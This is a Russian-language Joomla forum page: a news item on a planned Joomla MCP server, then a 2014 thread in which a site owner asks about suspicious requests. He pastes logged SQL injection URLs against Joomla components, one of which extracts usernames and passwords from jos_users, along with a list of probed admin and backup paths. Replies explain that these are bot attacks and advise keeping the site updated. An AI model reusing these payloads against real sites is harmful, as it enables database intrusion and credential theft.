Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2121 Просмотров
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Безопасность сайта
« : 11.07.2014, 14:52:59 »
Добрый день!
У меня сайт на Joomla! 2.5.
Обнаружил в компоненте перепаправление, такие запросы:
http://мой сайт/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat_ws(0x3B,123,321),4,5,6,7,8,9,10--

http://мой сайт/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,234567--

http://мой сайт/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat_ws(0x3B,123,321)--

http://мой сайт/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component

Это, что попытка взломать сайт?Или какой то робот ходит?
Интересно стало.
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Безопасность сайта
« Ответ #1 : 11.07.2014, 15:13:30 »
Попытка взлома, так называемый SQL Injection.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Безопасность сайта
« Ответ #2 : 11.07.2014, 15:20:54 »
Цитировать
Или какой то робот ходит?
Угу, из Нидерландов. Бань по IP
109.201.152.246
109.201.152.225
109.201.152.25
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #3 : 11.07.2014, 20:46:20 »
Спасибо, за ответ.
Прочитал про SQL Injection в Википедии, для меня темный лес.
Но сайт работает, значит попытка не удалась?
Не понимаю, надо что-то делать?
А в Метрике посмотрел, у меня визиты из США, Германии, Ирландии, Праги, Нидерландов. Продолжительность посещения 00:00.
Сайт на россиян расcчитан.
Еще раз Спасибо Всем. ^-^
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Безопасность сайта
« Ответ #4 : 13.07.2014, 11:42:38 »
Цитировать
Не понимаю, надо что-то делать?
Это боты ходят они по всем сайтам в сети лазят, не берите в голову, главное вовремя обновляйте все на сайте и минимальные требования по защите выполните.
Цитировать
Но сайт работает, значит попытка не удалась?
Сайт будет после взлома продолжать работать как и работал и вы не заметите что сайт был взломан.
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #5 : 13.07.2014, 12:25:50 »
Да. Дефейсят в последнее время редко.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #6 : 13.07.2014, 13:20:16 »
Спасибо всем за ответы!
Поставил защиту.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #7 : 15.07.2014, 14:18:33 »
Только ЗА 14 ИЮЛЯ ЗАПРОСЫ.
У меня на двух сайтах.
Начинает настораживать!
Или у всех так? ^-^

http://мой сайт/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140714-235809
http://мой сайт/index.php?option=com_community&view=frontpage&140714-235809
http://мой сайт/index.php?140714-235809
http://мой сайт/wp-content/
http://мой сайт/admin/content/sitetree/
http://мой сайт/users/registrate/
http://мой сайт/installed
http://мой сайт/users/forget/
http://мой сайт/netcat/admin/
http://мой сайт/plugins/search/index.php
http://мой сайт/database/
http://мой сайт/bkp/
http://мой сайт/administrator/components/com_admin/index.php
http://мой сайт/_backups/
http://мой сайт/bitrix/admin/
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #8 : 15.07.2014, 14:44:20 »
У всех.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #9 : 15.07.2014, 14:50:05 »
Спасибо, успокоили!
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #10 : 15.07.2014, 22:28:30 »
Это кстати повод напрягаться и следить за актуальностью сайта. Как правило бот лезут с не сильно свежими уязвимостями и сканят по шаблону.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 4476
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 278255
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 3655
Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 3238
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 5520
Последний ответ 28.08.2020, 22:00:30
от cntrl